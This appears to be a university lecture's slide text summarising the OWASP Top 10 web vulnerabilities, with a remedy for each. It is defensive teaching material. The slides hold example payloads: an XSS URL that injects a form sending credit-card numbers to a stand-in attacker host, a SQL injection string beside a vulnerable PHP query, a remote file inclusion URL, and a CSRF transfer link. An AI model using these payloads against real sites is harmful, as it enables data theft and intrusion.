Web Security
in 15 minutes
Ben Charlton
University of Kent
OWASP Top 10
- Nice concise list
- Good starting point
- Web only - doesn't apply to desktop/network/server
Cross Site Scripting (XSS)
- Easiest to carry out.
- Can be as simple as http://www.example.com/search?q=stuff
- ... http://example.com/search?q=<blink>
- Scaling up:
https://example.com/somepage?errCode=</h3><script>c=document.getElementById('content'); c.innerHTML='<form method="post" action="https://evilhacker.com/harvestCC">Enter Credit Card:<input type="text" name="cc"><input type="submit">';</script>
- ACTION:Input Validation. Escape all user supplied output.
Injection Flaws
- $sql = "SELECT userid FROM users WHERE username = '" . $_REQUEST['login'] . "' AND password = '" . $_REQUEST['pw'] . "'";
- pw = ' or 1 = '1
- SELECT userid FROM users WHERE
username = 'admin' AND password = '' or 1='1'
- ACTION:Input Validation. Use prepared statements, or your framework DB layer.
Injection
Source: XKCD
Malicious File Execution
- http://example.com/index.php?page=about.php
- include $_REQUEST['page']
- http://example.com/index.php?page=http://evilhacker.com/exploit.php
- ACTION: Always verify user input. Firewall can help. PHP:Disable allow_url_fopen and allow_url_include
Insecure Direct Object Reference
- http://someisp.com/myemail?userid=1024
- http://someisp.com/myemail?userid=1025
- ACTION: Access Controls. Check for XSS and SQL injection.
Cross Site Request Forgery
- http://somebank.com/transfer? from=me & to=evilhacker & amount=100.00
- MySpace Logout worked with a GET request
- POST is not safe, contrary to popular belief.
- CSRF token checking provided in many frameworks. Helps, but not foolproof.
- Extremely dangerous when combined with XSS
- Samy MySpace worm - 1 million friend requests in 20 hours
- ACTION: Use framework protection. If important change, email user, or require password.
Information Leakage
- Error messages that give away too much info - filenames or paths on system
- Mostly clues, but not always
- "You have entered an incorrect username"
- "Incorrect Password"
- ACTION: Check exception/error handling. Make sure dev changes don't affect production.
Broken Authentication
- Failure to protect credentials and session data
- Rubbish password reset
- Custom 'remember me' functionality
- LDAP standard means empty password = anonymous bind, which will succeed.
- ACTION: Too many to list
Insecure Cryptographic Storage
- Reversible (or plain text) passwords
- Proprietary vendor: "passwords encrypted with military grade AES-256 encryption blah blah"
- Custom encryption (MIFARE)
- ACTION: Do not use weak algorithms for hashing: MD5 rubbish. SHA1 not great.
Insecure Communications
- Use SSL for personal information/credentials
- BEWARE THE NULL CIPHER
Failure to Restrict URL access
- Hidden URLs only presented to privileged users.
- Lucky guess: http://example.com/admin/adduser.php or http://example.com/config.php.bak
- MacWorld 2007 approved "Platinum" passes worth $1700 via JavaScript on the browser rather than on the server.
- ACTION: Verify user access controls, beware of important files that rely on security through obscurity